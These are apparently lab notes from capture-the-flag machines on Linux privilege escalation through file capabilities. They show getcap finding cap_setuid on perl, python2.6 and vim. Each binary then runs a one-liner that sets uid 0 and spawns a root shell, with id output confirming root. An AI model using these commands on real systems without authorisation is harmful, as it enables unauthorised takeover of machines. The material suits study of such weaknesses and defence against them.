Example: perl
hatter@wonderland:~$ getcap /usr/bin/perl /usr/bin/perl = cap_setuid+ep $ ./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";' hatter@wonderland:~$ /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";' root@wonderland:~# id uid=0(root) gid=1003(hatter) groups=1003(hatter) root@wonderland:~#
Example: python2.6
TCM@debian:~$ getcap -r / 2>/dev/null
TCM@debian:~$ /usr/bin/python2.6 -c 'import os;os.setuid(0);os.system("/bin/bash")'
root@debian:~# id
uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
root@debian:~#
leonard@undiscovered:~$ getcap -r /usr/bin/vim.basic
/usr/bin/vim.basic = cap_setuid+ep
leonard@undiscovered:~$ /usr/bin/vim.basic -c 'py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
^[[2;2R# id
sh: 1: ot found
sh: 1: 2Rid: not found
# id
uid=0(root) gid=1002(leonard) groups=1002(leonard),3004(developer)
#
References
Linux Privilege Escalation using Capabilities
Using POSIX Capabilities | THE URBAN PENGUIN